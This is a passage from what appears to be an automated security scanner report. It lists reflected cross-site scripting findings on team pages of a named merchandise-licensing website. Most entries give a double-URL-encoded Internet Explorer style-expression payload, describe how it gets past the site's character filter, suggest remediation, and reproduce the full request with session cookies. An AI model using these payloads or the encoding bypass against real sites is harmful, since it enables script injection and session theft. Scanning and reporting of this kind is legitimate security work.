GET /NBA/los_angeles_lakers/8010793?66095%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252700567ee7d15=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.32. http://www.turnerlicensing.com/NBA/los_angeles_lakers/8050476 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/los_angeles_lakers/8050476
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 94806%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252713a71e1e314 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 94806'style='x:expression(alert(1))'13a71e1e314 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/los_angeles_lakers/8050476?94806%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252713a71e1e314=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.33. http://www.turnerlicensing.com/NBA/memphis_grizzlies [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/memphis_grizzlies
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9ff10%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bcb4a180582 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9ff10'style='x:expression(alert(1))'bcb4a180582 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/memphis_grizzlies?9ff10%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bcb4a180582=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.34. http://www.turnerlicensing.com/NBA/miami_heat [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/miami_heat
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8c96e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527db91eadeb70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8c96e'style='x:expression(alert(1))'db91eadeb70 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/miami_heat?8c96e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527db91eadeb70=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.35. http://www.turnerlicensing.com/NBA/miami_heat/8010795 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/miami_heat/8010795
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a51ee%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273e962f6b57e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a51ee'style='x:expression(alert(1))'3e962f6b57e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/miami_heat/8010795?a51ee%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273e962f6b57e=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.36. http://www.turnerlicensing.com/NBA/milwaukee_bucks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/milwaukee_bucks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d2b8b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527046c82d959d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d2b8b'style='x:expression(alert(1))'046c82d959d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/milwaukee_bucks?d2b8b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527046c82d959d=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.37. http://www.turnerlicensing.com/NBA/minnesota_timberwolves [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/minnesota_timberwolves
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f5210%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b54a972631c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f5210'style='x:expression(alert(1))'b54a972631c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/minnesota_timberwolves?f5210%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b54a972631c=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.38. http://www.turnerlicensing.com/NBA/new_jersey_nets [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/new_jersey_nets
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b3679%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279e9f63a36eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3679'style='x:expression(alert(1))'9e9f63a36eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/new_jersey_nets?b3679%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279e9f63a36eb=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.39. http://www.turnerlicensing.com/NBA/new_jersey_nets/8080309 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/new_jersey_nets/8080309
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 389d0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527622558a5928 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 389d0'style='x:expression(alert(1))'622558a5928 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/new_jersey_nets/8080309?389d0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527622558a5928=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.40. http://www.turnerlicensing.com/NBA/new_orleans_hornets [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/new_orleans_hornets
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9d44a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272283fff6c79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9d44a'style='x:expression(alert(1))'2283fff6c79 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/new_orleans_hornets?9d44a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272283fff6c79=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.41. http://www.turnerlicensing.com/NBA/new_york_knicks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/new_york_knicks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 18049%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a326d28a6dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 18049'style='x:expression(alert(1))'a326d28a6dd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/new_york_knicks?18049%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a326d28a6dd=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.42. http://www.turnerlicensing.com/NBA/oklahoma_thunder [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/oklahoma_thunder
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ba37e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270e97dc019c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba37e'style='x:expression(alert(1))'0e97dc019c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/oklahoma_thunder?ba37e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270e97dc019c4=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.43. http://www.turnerlicensing.com/NBA/orlando_magic [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/orlando_magic
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fc6ff%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e1d7e340077 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc6ff'style='x:expression(alert(1))'e1d7e340077 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/orlando_magic?fc6ff%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e1d7e340077=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.44. http://www.turnerlicensing.com/NBA/philadelphia_76ers [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/philadelphia_76ers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 91094%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527037823385a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91094'style='x:expression(alert(1))'037823385a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/philadelphia_76ers?91094%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527037823385a2=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.45. http://www.turnerlicensing.com/NBA/phoenix_suns [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/phoenix_suns
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c7aca%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527118be204132 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c7aca'style='x:expression(alert(1))'118be204132 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/phoenix_suns?c7aca%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527118be204132=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.46. http://www.turnerlicensing.com/NBA/portland_trail_blazers [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/portland_trail_blazers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8dc4e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d08698a97ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8dc4e'style='x:expression(alert(1))'d08698a97ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
